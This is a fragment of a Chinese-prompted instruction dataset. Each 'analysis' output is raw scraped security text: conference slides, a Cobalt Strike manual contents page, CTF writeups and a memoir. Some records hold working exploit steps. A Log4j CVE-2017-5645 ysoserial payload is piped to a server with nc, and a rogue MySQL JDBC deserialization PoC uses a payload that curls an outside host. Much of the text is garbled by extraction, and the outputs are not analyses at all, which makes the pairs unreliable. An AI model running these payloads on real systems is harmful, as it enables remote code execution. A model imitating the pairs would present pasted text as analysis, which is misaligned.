注意此文件并不支持变量替换之类的任何高级 shell 特性 以便于应用程序无须支持这些高级 shell 特性 即可直接使用此文件 .PP 注意内核引导选项 \\fIvconsole\\&.keymap=\\fR, \\fIvconsole\\&.keymap\\&.toggle=\\fR, \\fIvconsole\\&.font=\\fR, \\fIvconsole\\&.font\\&.map=\\fR, \\fIvconsole\\&.font\\&.unimap=\\fR 可以覆盖此文件中的设置 .PP 在某些发行版上如果该文件不存在可能还会到其他位置去寻找 这取决于个别发行版自己的设置 [译者注]目前的Linux内核并不支持\\m[blue]\\fB中文控制台\\fR\\m[]\\&\\s-2\\u[1]\\d\\s+2除非你使用了\\m[blue]\\fBCJKTTY\\fR\\m[]\\&\\s-2\\u[2]\\d\\s+2补丁 .SH \"选项\" .PP 能够识别的命令行选项如下 .PP \\fIKEYMAP=\\fR, \\fIKEYMAP_TOGGLE=\\fR .RS 4 配置键盘映射表 \\fIKEYMAP=\\fR 的默认值是 \"us\" (此默认值也适合于中文控制台) \\fIKEYMAP_TOGGLE=\\fR 用于配置第二切换键盘映射表 其默认值是空(也就是未定义) .RE .PP \\fIFONT=\\fR, \\fIFONT_MAP=\\fR, \\fIFONT_UNIMAP=\\fR .RS 4 配置控制台字体控制台字体映射 控制台Unicode字体映射 .RE .SH \"例子\" .PP \\fBExample\\ \\&1.\\ \\&德文键盘与控制台\\fR .PP /etc/vconsole\\&.conf: .sp .if n \\{\\ .RS 4 .\\} .nf KEYMAP=de\\-latin1 FONT=eurlatgr .fi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n4.1 Manual Strategic Cyber LLC (A HelpSystems Company) www.cobaltstrike.com/ / 2/ Table of Contents Table&of&Contents&..................................................................................................................................&2/ 1.&Welcome&to&Cobalt&Strike&..............................................................................................................&6/ 1.1#What#is#Cobalt#Strike?#............................................................................................................................#6/ 1.2#Installation#and#Updates#.......................................................................................................................#7/ System'Requirements'...................................................................................................................................................'7/ Run'the'update'program'............................................................................................................................................'7/ 1.3#The#Team#Server#......................................................................................................................................#8/ 1.4#Cobalt#Strike#Client#.................................................................................................................................#9/ 1.5#Distributed#and#Team#Operations#...................................................................................................#10/ 1.6#Scripting#Cobalt#Strike#.........................................................................................................................#11/ 2.&User&Interface&.................................................................................................................................&12/ 2.1#Overview#...................................................................................................................................................#12/ 2.2#Toolbar#......................", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Super Secret Hidden Service Web, 100 points ## Description: > TODO: Remember where I put that flag... ## Solution: A link to a website was attached. the site was called \"Dead simple Todolists\" and allowed creating a simple TODO list. The list created by using the interface had the following link: ``` http://138.247.13.110/todolist/1000/ ``` Accessing different IDs allowed viewing other users' TODOs. Therefore, the following bash command could be used to search for the flag: ```console # for i in `seq 1 1000`; do curl -s http://138.247.13.110/todolist/$i/ | gre p MCA; done <li><input type=\"checkbox\" id=\"checkbox\" data-todo-id=\"678\"> MCA{al3x4_5et_a_r3minder}</li> ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHow can I pwn thee? Let me count the ways RenderMan RenderLab.net & Church of Wifi Render@Renderlab.Net How can I pwn thee?  Born out of conversations at SECTOR  Workforce is increasingly mobile and wireless  Mobile users are away from your watchful BOFH eye (and punishment)  How do you educate them, protect your company, protect yourself  By no means and exhaustive list  Full Disclosure Meet Bob  Bob works for widgets international  Bob sells widgets  Bob travels to customer sites  Bob is your worst nightmare Bob  Bob likes to think himself tech savvy  Bob really just knows enough to get access to pr0n  Bob is widgets internationals worst enemy  Bob is also the worst case scenario Let me count the ways  Let's pwn Bob  We won't touch Bob, just abuse wireless communication  I.E. Bored hackers on long trips to a conference through international airports coming from another international conference in, say, Norway... WiFi Threats  Bob has a laptop with tons of private company info  Bob likes to connect to hotspots at airports, train stations, hotels  Bob connects to anything  Linksys Global Network WiFi Threats  Hotspots generally do not encrypt  Cleartext = Clear to read = Clear to inject  Images, Scripts, DNS, etc  No VPN = certain pwn'age  No firewall + browsable shares = pillage!  MiTM attacks, password snarf  Defcon 15 Hotel net  Attacker is on the local net  Driver Vulns Norway experiment  Airpwn inject 'alternate' images  See if other continents were observant  First image, not so much... First Image Norway Experiment  Not many noticed  A few scratched heads  Lets up the ante  Second image... Second Image They got the hint I didn't get punched in the face (yay!) WiFi Threats  Karma, Hotspotter, Metasploit  Hacking the friendly skies  Cafe Latte exploit, recover company WEP keys  De-auth headaches  If it's on, it's probably pwn'able Stopping WiFi Threats  Disable Wifi when not in use  Connect to network but use VPN for everything  Assume your being attacked  Don'", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n我这10年的搞站路 我叫老牛是高中室友给起的原因很简单我在8人寝室年龄排第六四川话老6和老牛读音相仿 后来我就把我的qq昵称改成了L.N.我接受了这个称呼因为自我审视性格的确有执拗的一面内 向且不善言谈我以老牛的称呼警醒自己大学就去参加了很多社团和当了2年团支书得到了不错的 改善扯远了说回来L.N.是我踏上搞站路的第一个代号中途换过几个发现还是L.N. 更像我就这样一直用到现在 第一次知道破解别人QQ空间密码是可以学习的也是在高中于是迫不及待的学习了一些如今看来都是 违法乱纪的技术手段最后qq空间密码没破解开倒是认识了很多技术上的好朋友大家一起开开心心 的装逼很是快乐 从我开始决定不和他们这样装逼下去认真的开始写第一行PHP代码开始是在我2010年开始读大 学成都信息工程学院电子商务专业军训一结束拿着有限的4000块钱跑到电脑城配电脑左手一个主 机右手一个显示器高兴的像个傻子 大学5年转专业多读了一年在攻防技术知识海洋里痛苦着快乐着搞学校服务器论坛YY吹牛 逼红盟08sec90sec后来转专业到信息安全加入syclover小组通过学长引荐加入了insight- labs知道了世界有多大自己有多菜自己还是一个挖着CMS漏洞的web狗的时候团队大哥做的分 享已经是渗透三通道控制潜伏操作执行数据密取于是低调了很多牛逼吹不出了只能继 续边学习边搞站有巨人在前动力往往是喷涌不断的 14年开始出来实习了实习前有个小插曲至今记得由于PHP漏洞挖的还可以被拉入了一个搞PHP的 群里有一天我问兴趣成了工作是一件好事么heige说是当时不清楚他是到了创宇还是在医 院他大致观点是兴趣和工作可以兼容另外一个搞PHP的人都很认可的大哥ryat说不是听说ryat大哥 不在安全圈子在做公务员现在回头来看我选择不是 就这样我开始工作了由于2个学长多读一年只能叫学长和我一起参加国家测评中心比赛拿了第一 大家一起去实习了一个拿了编制和北京户口一个没有选择编制但也留了下来而我傻乎乎拿着360 的sp去了攻防实验室走的时候国测的leader是一名年纪偏大的大叔据说调他去网信办他不去当 时他劝我留下虽然我是本科可以走特批有编制他的有一句话我至今记得越到现在我体会越深 刻你留在这儿就是从半山腰出发不听老人言吃亏在眼前可能说的就是我在国测也有一个小 插曲在实习的时候一年一次的国测比赛又开始了我的工作是赛前审题和现场工作人员当时猪猪侠 代表广测来参加比赛我站在背后偷偷看他用UDF提权还测了好几次才成功哈哈哈哈最后他们拿 了第一 接着就去了360攻防实验室开始做渗透测试记得有个同学说你来了我们的成功率提升了一半一 时有点小得意后来搞智能硬件时间不长只待了8个月可以说是年轻气盛离开原因很简单原因是 给我打了C事情是有一天我们拿到了一批乌云注册用户的邮箱地址然后我突发奇想让我带的实习生 小莫注册一个google邮箱群发招聘实习生没经验发邮箱没挂代理最后乌云要发律师函惊动了谭 总小莫是我带的实习生不能让他受处罚会影响他offer的于是我和我的老大哥mickey双双背了 C 正巧insight-labs的几个大哥都在乌云我就去了乌云是因为三个白帽跑过去和ca叔一起弄工作很 开心好景不长工作了3个月就蹲地举手了在乌云比较有意思的几个事情都是和实习的小P干 的我去淘宝二手买了个电信企业级路由拿回来我们一起挖漏洞最后他提交乌云赚了通用说好 的火锅反正我是还没吃上蹲地举手的那天也是小P毕业正式入职的第一天据说还没到自己工位是 坐在我工位上和ca叔吹牛的时候就被拿下了我当时还在星巴克等我的摩卡可可碎片星冰乐 乌云被办对当时的我冲击挺大的不可否认我当时很天真也很理想也把三个白帽当亲儿子一气之下 就去西北耍了半个月回了成都有点心灰意冷想的是找个地方养老算了于是去了中国网安 ms509薪资比我应届毕业时候的都低我也没在意当时没有房贷很天真在网安有很多同班同 学工作节奏也慢过的也挺开心的周末没事就拉着几个朋友自驾去川西跑一圈也是美滋滋就这样 过了1年半慢慢觉得生活还是要有激情太安逸了就这样一辈子也是无趣 这个时候360的老领导懒总这个时候已经分家成奇安信了但还是叫360企业安全说成都有岗位了 做红队我想从入行到现在一直做攻击没有脱离一线去做红队也挺合适的于是重燃了斗志这一 下就是快3年了 就这么一晃而过10年了我也算是经历了事业单位私企甲方国企乙方回头一看做过的事情 还挺不少我一直坚信安全的本质是攻防对抗因此作为搞攻击的必须在一线体会真实的战场才能看 清楚什么是攻防没有体会过子弹打在肉上的感觉不要说自己在战场在一线这也是我定义的一线选 手脱离这样的一线快一年了也做过一些牛逼的事情以后老了给儿子吹牛用在这儿想起了处在一 线多年的大哥说过的话当时我问他要不要出来到公司干做红队也挺不错他说我要做点牛逼的事 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacking the Supply Chain The Ripple20 Vulnerabilities Haunt Hundreds of Millions of Critical Devices DEF CON 28 Safe Mode 1 Who are we? 2 JSOF is a software security consultancy  Shlomi Oberman, co-founder, JSOF  Moshe Kol, Security researcher, JSOF; Finder of Ripple20  Ariel Schön, Security researcher, JSOF Agenda 3  Ripple20  CVE-2020-11901  Exploiting CVE-2020-11901 Ripple20 4  Series of 19 zero-day vulnerabilities in Treck TCP/IP*  Amplified by the supply chain  100s of millions of devices  Medical, ICS, Home, Enterprise, Transportation, Utilities Ripple20 5 CVE-2020-11896 CVE-2020-11897 CVE-2020-11898 CVE-2020-11899 CVE-2020-11900 CVE-2020-11901 CVE-2020-11902 CVE-2020-11903 CVE-2020-11904 CVE-2020-11905 CVE-2020-11906 CVE-2020-11907 CVE-2020-11908 CVE-2020-11909 CVE-2020-11910 CVE-2020-11911 CVE-2020-11912 CVE-2020-11913 CVE-2020-11914  4 critical remote code execution vulnerabilities Ripple20 6 CVE-2020-11896 CVE-2020-11897 CVE-2020-11898 CVE-2020-11899 CVE-2020-11900 CVE-2020-11901 CVE-2020-11902 CVE-2020-11903 CVE-2020-11904 CVE-2020-11905 CVE-2020-11906 CVE-2020-11907 CVE-2020-11908 CVE-2020-11909 CVE-2020-11910 CVE-2020-11911 CVE-2020-11912 CVE-2020-11913 CVE-2020-11914  8 medium-high severity vulnerabilities 100s of Millions of Devices Affected And many more... 7  Assumption: Every mid-large US organization has one 100s of Millions of Devices Affected 8 Medical Printers Utilities Transportation Networking Datacenter Smart Buildings Industrial Supply chain 9 Supply chain 10 11 Icon from www.flaticon.com Vulnerabilities 12 Icon from www.flaticon.com Ripple20 13 Icon from www.flaticon.com Why Treck TCP/IP? 14  Supply chain - mostly unexplored  1 vulnerability == multiple products  Large IoT impact  Zombie vulnerabilities  Good attack surface Treck TCP/IP 15  Treck is a small American company  Treck TCP/IP is a proprietary TCP/IP stack; Available >20 years  Embedded devices and RTOS  Very configurable. Each Treck instance is different.  Strategically located", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nVarious writeups for the [2022 Intent CTF](https://ctf.intentsummit.org) ([CTFTime Link](https://ctftime.org/event/1773)). Writeups for additional challenges can be found [here](https://jctf.team/INTENT-CTF-2022/). Participated as part of the [JCTF team](https://jctf.team/), which came in first! ![](images/top3.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMachine Learning Protect against tomorrows threats Adversarial Machine Learning And Several Countermeasures Trend Micro ch0upi miaoski 7 Dec 2017 Machine Learning Protect against tomorrows threats Machine Learning Protect against tomorrows threats ch0upi  Staff engineer in Trend Micro  Machine Learning + Data Analysis  Threat intelligence services  NIPS  KDDCup 2014 + KDDCup 2016: Top10  GoTrend: 6th in UEC Cup 2015 Machine Learning Protect against tomorrows threats Machine Learning Protect against tomorrows threats miaoski  Senior threat researcher in Trend Micro  Threat intelligence  Smart City  SDR  Arduino + RPi makers  貓奴 Machine Learning Protect against tomorrows threats Machine Learning Protect against tomorrows threats 4 Outline  Cheating machine learning?  Attacking theories and practices  Countermeasures  Conclusion Machine Learning Protect against tomorrows threats CHEAT MACHINE LEARNING MODELS Machine Learning Protect against tomorrows threats Machine Learning Protect against tomorrows threats We Were Good Guys ... Machine Learning Protect against tomorrows threats Machine Learning Protect against tomorrows threats Even NVIDIA... Machine Learning Protect against tomorrows threats Machine Learning Protect against tomorrows threats ML-Based Anti-Virus? Machine Learning Protect against tomorrows threats Machine Learning Protect against tomorrows threats ML-Based Anti-Virus? Machine Learning Protect against tomorrows threats Machine Learning Protect against tomorrows threats CSOs Explained Machine Learning Protect against tomorrows threats Machine Learning Protect against tomorrows threats But Still ... Machine Learning Protect against tomorrows threats Machine Learning Protect against tomorrows threats Rescan Makes It Worse Compiler Hello World (no debug) Hello World (debug) Nothing (no debug) Nothing (debug) Visual Studio 2017 Cylance, Jiangmin Cylance, Cyren, F-Prot, Sophos ML, SentinelOne Static ML Cylance, Jiangmin Cylance, Cyren, F-Prot, Sophos ML, Sen", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSnakeYaml SnakeYaml SnakeYaml SnakeYaml SnakeYaml SPI ScriptEngineManager C3P0 ScriptEngineManager Reference SnakeYaml snakeyamlyamlyamlxmlproperties SpringyamlSnakeYamlYAML1.1 ProcessorUTF-8/UTF-16Java/YAML yamlhttps://www.yiibai.com/yaml Spring ymlyamlpocyml yamlhttps://www.345tool.com/zh-hans/formatter/yaml-formatter SnakeYaml <!-- https://mvnrepository.com/artifact/org.yaml/snakeyaml --> <dependency> <groupId>org.yaml</groupId> <artifactId>snakeyaml</artifactId> <version>1.27</version> </dependency> String dump(Object data) JavaYAML void dump(Object data, Writer output) JavaYAML String dumpAll(Iterator<? extends Object> data) JavaYAML void dumpAll(Iterator<? extends Object> data, Writer output) JavaYAML String dumpAs(Object data, Tag rootTag, DumperOptions.FlowStyle flowStyle) JavaYAML String dumpAsMap(Object data) JavaYAML <T> T load(InputStream io) YAMLJava <T> T load(Reader io) YAMLJava <T> T load(String yaml) YAMLJava Iterable<Object> loadAll(InputStream yaml) YAMLJava Iterable<Object> loadAll(Reader yaml) YAMLJava Iterable<Object> loadAll(String yaml) YAMLJava SnakeYamlYaml.dump()Yaml.load()yaml Yaml.load()Java Yaml.dump()yaml User public class User { public String name; public void setName(String name) { this.name = name; } public String getName() { return name; } } Demo import Yaml; public class SankeYamlDemo { public static void main(String[] args) { User user = new User(); user.setName(\"xiaobei\"); Yaml yaml = new Yaml(); String dump = yaml.dump(user); System.out.println(dump); } } org.yaml.snakeyaml. !!com.zh1z3ven.SnakeYaml.User {name: xiaobei} !! fastjson @type User,print public class User2 { String name; int age; public User2() { System.out.println(\"User\"); } public String getName() { System.out.println(\"User.getName\"); return name; } public void setName(String name) { System.out.println(\"User.setName\"); this.name = name; } public String getAge() { System.out.println(\"User.getAge\"); return name; } public void setAge(String name) { System.out.println(", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDEFCON 15 Multiplatform malware within the .NET-Framework Multiplatform malware within the .NET-Framework DEFCON 0x0f August 3rd  August 5th Paul Sebastian Ziegler psz@observed.de DEFCON 15 Multiplatform malware within the .NET-Framework What exactly is multiplatform malware? DEFCON 15 Multiplatform malware within the .NET-Framework  Runs on several different processors or host operating systems  Does not need to be modified from system to system  Is able to jump from one system to another  May be anything from worm to trojan to virus Multiplatform malware... DEFCON 15 Multiplatform malware within the .NET-Framework Multiplatform malware does not...  Attack common design flaws in broadly used protocols various operating systems implement (XSS is not multiplatform malware)  Need to be in binary form DEFCON 15 Multiplatform malware within the .NET-Framework Recent Developments  More Devices  More Operating Systems  More Cross-System Integration  More Mobility  Less Security-Concerns DEFCON 15 Multiplatform malware within the .NET-Framework Notable implementations of multiplatform malware up until now  {Win32, Linux}/Simile.D (Virus)  Infects both PE and ELF executables  Polymorphic and Metamorphic  W32/Linux.Bi  PoC Virus  Infects local files DEFCON 15 Multiplatform malware within the .NET-Framework The Potential of multiplatform malware DEFCON 15 Multiplatform malware within the .NET-Framework I. Jumping Systems DEFCON 15 Multiplatform malware within the .NET-Framework The Old Standard Secret Service Guy: We need access to that network and we need it now! Some Geek: Oh... yeah... right. Look, I'm really sorry, but I was extremely busy tonight. See, when I scanned that employee's firewall I saw that his son had an Xbox360 connected to the Internet so I spent all night hacking it just to get his savegames... Secret Service Guy: WTF? Do you know what this means? They have 200 nuclear warheads stationed around the world! Also we believe that they cut 26,72$ tax last year", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPentesterAcademy.co m/ PentesterAcademy.com VOIPSHARK:开源VOIP分析平台是与非 Nishant/Sharma/ Jeswin1Mathai1 Ashish1Bhangale1 PentesterAcademy.com1&1AttackDefense.com1 PentesterAcademy.co m/ PentesterAcademy.com PentesterAcademy.co m/ 关于我们 我,/Nishant/Sharma/  R&D1经理理及资深培训师, Pentester1Academy1  固件开发者, 企业级WiFi1APs和WIPS传感器器  信息安全硕士  曾在US/Asia1BlackhatDEFCON1USA及其它大会上发表演讲 1 合作者  Ashish/Bhangale,1高级安全研究员  Jeswin/Mathai,1安全研究员 PentesterAcademy.co m/ PentesterAcademy.com PentesterAcademy.co m/ PentesterAcademy.com1 PentesterAcademy.co m/ PentesterAcademy.com PentesterAcademy.co m/ AttackDefense.com1 PentesterAcademy.co m/ PentesterAcademy.com PentesterAcademy.co m/ 演讲概览  VoIP基本知识  SIP,1RTP1  安全相关:1TLS,1SRTP11 1  复原/解密VoIP通话 1  目前已有的开源工具及其问题 1  VoIPShark1  架构及内部原理理  分析VoIP流量量  复原通话  被动攻击检测  演示 PentesterAcademy.co m/ PentesterAcademy.com PentesterAcademy.co m/ VoIP电话通讯  信令1+1媒体 PentesterAcademy.co m/ PentesterAcademy.com PentesterAcademy.co m/ 信令协议1 SIP/(会话初始协议)  IETF制定  替代固话及PSTN(公共电话交换网络)1 1 H.3231  ITU-T制定  主要为视频会议制定也用于语音通话 1 SCCP/(瘦客户端)1  用于电话线路路侧控制的思科专有协议 PentesterAcademy.co m/ PentesterAcademy.com PentesterAcademy.co m/ 会话初始协议  基于文本的协议  应用  使用其它媒体流的通话(语音视频)如RTP1  使用SIP协议的Message方法发送文本消息  与其它协议协同工作  会话描述协议1(SDP)1定义媒体协调和设置过程  可在TCP,1UDP1或1SCTP1(流控制传输协议)上工作  安全性由TLS1(安全传输层协议)1提供如SIP1over1TLS1 1 PentesterAcademy.co m/ PentesterAcademy.com PentesterAcademy.co m/ 订阅, 发布和通告 PentesterAcademy.co m/ PentesterAcademy.com PentesterAcademy.co m/ 会话初始协议: 通话过程示例例 PentesterAcademy.co m/ PentesterAcademy.com PentesterAcademy.co m/ 用户代理理服务 (UAS) 解决方案 www.sipfoundry.org1 freeswitch.org1 www.elastix.org1 www.asterisk.org1 www.3cx.com1 PentesterAcademy.co m/ PentesterAcademy.com PentesterAcademy.co m/ 软电话客户端  基于IP的电话服务1  可选软件1  Zoiper1  X1Lite1  LinPhone1  MicroSIP1 选择软电话客户端需考虑的因素1  是否有编译码支持1  是否可以加密1(尤其是免费版)1  其它功能1(如文本消息挂起等待)1 www.zoiper.com1 www.microsip.org1 www.linphone.org1 www.counterpath.com/x-lite-download1 www.3cx.com1 PentesterAcademy.co m/ PentesterAcademy.com PentesterAcademy.co m/ Aste", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Apache Log4j Server 反序列化命令执行漏洞CVE-2017-5645 Apache Log4j是一个用于Java的日志记录库其支持启动远程日志服务器Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞攻击者可利用该漏洞执行任意代码 ## 漏洞环境 执行如下命令启动漏洞环境 ``` docker compose up -d ``` 环境启动后将在4712端口开启一个TCPServer 说一下除了使用vulhub的docker镜像搭建环境外我们下载了log4j的jar文件后可以直接在命令行启动这个TCPServer`java -cp \"log4j-api-2.8.1.jar:log4j-core-2.8.1.jar:jcommander-1.72.jar\" org.apache.logging.log4j.core.net.server.TcpSocketServer`无需使用vulhub和编写代码 ## 漏洞复现 我们使用ysoserial生成payload然后直接发送给`your-ip:4712`端口即可 ``` java -jar ysoserial-master-v0.0.5-gb617b7b-16.jar CommonsCollections5 \"touch /tmp/success\" | nc your-ip 4712 ``` 然后执行`docker compose exec log4j bash`进入容器可见 /tmp/success 已成功创建 ![](1.png) 执行[反弹shell的命令](http://www.jackson-t.ca/runtime-exec-payloads.html)成功弹回shell ![](2.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 JDBC反序列化学习 JDBC 测试环境 建JDBC连接 反序列化简单介绍 断点调试 构造POC show session status响应包 Exp 补充 资料原 不复制粘贴了,JDBC基础介绍 IDEA Mysql 5.7 https://www.runoob.com/java/java-mysql-connect.html 学习来源 https://xz.aliyun.com/t/8159 JDBC 1 Java Database Connectivity 测试环境 建JDBC连接 2 下载驱动包 https://dev.mysql.com/downloads/connector/j/ 不要下最新的估摸着是修了下载8.0.12 多下个版本 3 右键引作为module库就跑起来了 漫谈Java反序列化 https://github.com/SummerSec/JavaLearnVulnerability 每个版本在反序列化利的时候有定区别 反序列化简单介绍 4 以及落萧萧的article 跟着章学习 com.mysql.cj.jdbc.Driver的触发点是 要触发需要在连接字符串中加上 打断点 1 反序列化漏洞三要素实现Serializabe接readObject()writeObject()法 缺不可 2 3 漏洞挖掘或许就是怎么找到可控点达到rce的的 断点调试 1 com.mysql.cj.jdbc.result.ResultSetImpl.getObject() 1 queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffI nterceptor&autoDeserialize=true 5 如果是进制数据就会往下到readObject处触发反序列化 6 这个法在 com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor.populateMapWithS essionStatusValues() 处调 对其他的漏洞分析章发现我的这个版本在这没有了对结果处理的函数 调点 7 根据执 SHOW SESSION STATUS 这条语句之后要在服务端返回个恶意的进制对象所以重点就是 怎么构造这个对象有时候漏洞存在的情况仍然攻击不成功有可能是因为各个版本的mysql发包不样 需要抓包定制化攻击 Mac下抓包测试 第个是Response Ok 构造POC 1 tcp.port ==3306 && mysql 8 数据包内容为 重点是这个响应包 结果集响应包的结构 1 0700000200000002000000 show session status响应包 9 数据段1说明下的结果集有多少列 数据段2列的定义 数据段3 EOF 包 数据段4数据 结果集数据包如图 10 整个数据包如下 1 01 数据度为1 00 00 01 sequence id为1 02 代表有两列 11 第三部分是EOF章作者说加上就会报错我在问熟悉这个漏洞的朋友 第四部分就是的poc 使yso成即可 yso的链前不懂 补充截图 问候报 1 java -jar wingyso.jar CommonsCollections7 \"curl 5s3g.hyuga.co\" > data 12 所有的response需要对应上 作者的poc 1 # -*- coding:utf-8 -*- 2 #@Time : 2020/7/27 2:10 3 #@Author: Tri0mphe7 4 #@File : server.py 5 import socket 6 import binascii 7 import os 8 9 greeting_data=\"4a0000000a352e372e31390008000000463b452623342c2d0 0fff7080200ff811500000000000000000000032851553e5c23502c51366a006 d7973716c5f6e61746976655f70617373776f726400\" 10 response_ok_data=\"0700000200000002000000\" 13 11 12 def receive_data(conn): 13 data = conn.recv(1024) 14 print(\"[*] Receiveing the package : {}\".format(data)) 15 return str(data).lower() 16 17 def send_data(conn,data): 18 print(\"[*] ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBuilding the Pe rfe ct Evil Tw in Rich Mo gull Se curo sis, LLC e curo sis.co m Are nt Evil Tw ins Old Ne w s? Ye p, but so is Jim m y Buffe tt and he still se lls o ut m o re sho w s than go d. e curo sis.co m Evil Tw in 1 01 X 1 . Inje ct de auth 2 . Ove rpo w e r AP and MiTM 3 . Enjo y pw nage e curo sis.co m Evil Tw in 501 Se lf co ntaine d High po w e re d Dro p and le ave Multiple e xplo it o ptio ns e curo sis.co m Explo it Optio ns  Explo it bro w se r o n splash scre e n and install tro jan fo r late r acce ss.  Sniff/MiTM traffic.  Inje ct HTML e curo sis.co m Why This Matte rs?  The re s no thing ne w he re , but this attack w ill be e ffe ctive fo r ye ars to co m e .  Its a gre at ve cto r fo r any 0days o r o the r e xplo it advance m e nts.  Ente rprise s are w e ll pro te cte d, but distribute d e nte rprise s are m o re vulne rable .  Pw n the co nsum e r, e ve ntually yo u o w n the e nte rprise . Rich Mo gull rm o gull@ se curo sis.co m http://se curo sis.co m AIM: se curo sis Skype : rm o gull Se curo sis, L.L.C.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFinding 0days in Enterprise Software Shubham Shah Hacking HCL Digital Experience also known as IBM Websphere Portal What is HCL Digital Experience / IBM Websphere Portal  Enterprise content management system.  Used by medium - large enterprises, and is a very flexible content delivery application.  Around 4.5k instances on the internet.  Often self-hosted on an IBM WebSphere server.  Widespread usage amongst fortune 500 and in companies running bug bounties. IBM WebSphere  Getting started by running the docker image:  docker run -p 127.0.0.1:30015:30015 ibmcom/websphere-portal:latest Decompiling JARs  find . -type f -name \\*.jar -exec tar rf /tmp/outfile2.tar {} \\;  find . -type f -name '*.jar' | xargs -n 1 -P 20 -I {} procyon-decompiler -o decompiled2 {} Finding The Attack Surface  grep -anril <servlet-mapping>' or grep -anril <mapping ' Interesting config file  PortalServer/base/wp.proxy.config/installableApps/wp.proxy.config.ear/ wp.proxy.config.war/WEB-INF/proxy-config.xml Finding the endpoint  One of the hardest bits of source code analysis when finding bugs through grep is identifying the endpoint that the config files/code are triggered by.  This one was easy, they were deployed under /wps/*  i.e. /wps/proxy/, /wps/myproxy/, /wps/common_proxy/, /wps/cmis_proxy/  But the proxy-config file says that we can only access ibm.com and redbooks.ibm.com - how are we going to turn this into a full read SSRF? Chaining a Lotus Domino Open Redirect  www.redbooks.ibm.com runs Lotus Domino to deliver content to users.  We must achieve an open URL redirect on www.redbooks.ibm.com to achieve SSRF to arbitrary hosts.  After researching Lotus Domino, I noticed some extremely old documentation around the sign out process.  This process allows users to be redirected to an arbitrary location after signing out. Chaining a Lotus Domino Open Redirect https://help.hcltechsw.com/dom_designer/9.0.1/appdev/H_ABOUT_URL_COMMANDS_FOR_REQUIRING_AUTHENTICATION.html Chaining a Lotus Domino Ope", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nimport binascii, hashlib, time, string, sys from ws4py.client.threadedclient import WebSocketClient CHALLENGE = \"0\"; RE_ARRANGED = \"1\"; GIVE_GUESS = \"2\"; UNACCEPTABLE = \"3\"; GREATE_GUESS = \"4\"; WRONG_GUESS = \"5\"; BYE = \"6\"; FLAG_IS = \"7\"; slave=-1 guess=0 class Client(WebSocketClient): def closed(self, code, reason=None): print \"Closed down\", code, reason def received_message(self, m): global slave, guess print \"Received:\" m=str(m) print m code=m[0] msg=m[1:] if code==CHALLENGE: self.auth=True i=0 while True: i+=1 th=hex(i)[2:] th=\"0\"*(8-len(th))+th chal = hashlib.md5(th).hexdigest() chal = bin(int(chal, 16))[2:] chal = chal[:22].zfill(22) if chal==msg: self.send(th) break if i%500000==0: print i elif code==RE_ARRANGED: print \"Rearranged to\", msg slave+=1 guess=slave elif code==GIVE_GUESS: print \"Give guess:\",msg r.send(str(guess)) elif code==WRONG_GUESS: print \"Wrong guess:\",msg guess=int(msg) elif code==GREATE_GUESS: print \"CORRECT!!!!!!!!!!!\",msg r=Client(\"ws://ctf.sharif.edu:8998\", protocols=[\"http-only\", \"chat\"]) r.connect() r.run_forever()", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe NMRC The NMRC Warez Warez 2005 2005 Extravaganza Extravaganza DefCon DefCon 2005 2005 nnomad omad m mobile obile rresearch esearch ccentre entre With just a few keystrokes, cybercriminals around the world can disrupt our economy. - Ralph Basham, Director of the U.S. Secret Service at RSA 2005. With just a few keystrokes, pundits can disrupt our freedoms. - Daaih Liuh, NMRC, 2005 With just a few keystrokes, I can turn those pundits off and watch porn instead.  jrandom, NMRC, 2005 Who We Are Who We Are On To The On To The Warez Warez .. Updated Updated Ncrypt Ncrypt  New features and bug fixes  Includes Todd MacDerminds nrm, a drop-in replacement for rm for secure file erasure  More features for script integration (the users demanded it!) Stronghold  For Windows 2000, XP, 2003  Locks down the box  Implements the NIST standards for securing Windows  Rollback feature  GPL, and its freeware, feel the love Stronghold Analyzer  For Windows 2000, XP, 2003  Like Stronghold, it uses NIST standards for securing Windows  Shows security holes that exist in Windows that Stronghold will secure  GPL, and its freeware, feel even more love Stronghold / Stronghold Stronghold / Stronghold Analyzer Demo Analyzer Demo SPA  SPA is Single Packet Authentication, a single packet that can authenticate a user to a system  It is a protocol for allowing a remote user to authenticate securely on a closed system (limited or no open services)  Uses GPG to sign/encrypt a message to a sniffing server in a single TCP, UDP, or ICMP packet  Work across NAT  Free SPA Demo SPA Demo NPC  NPC is Nearly Perfect Crypto. Seriously.  It includes a utility for creating large one time pads (using the PRNG ISAAC)  Fast, simple and quick  If you can manage the key exchange, it is nearly the 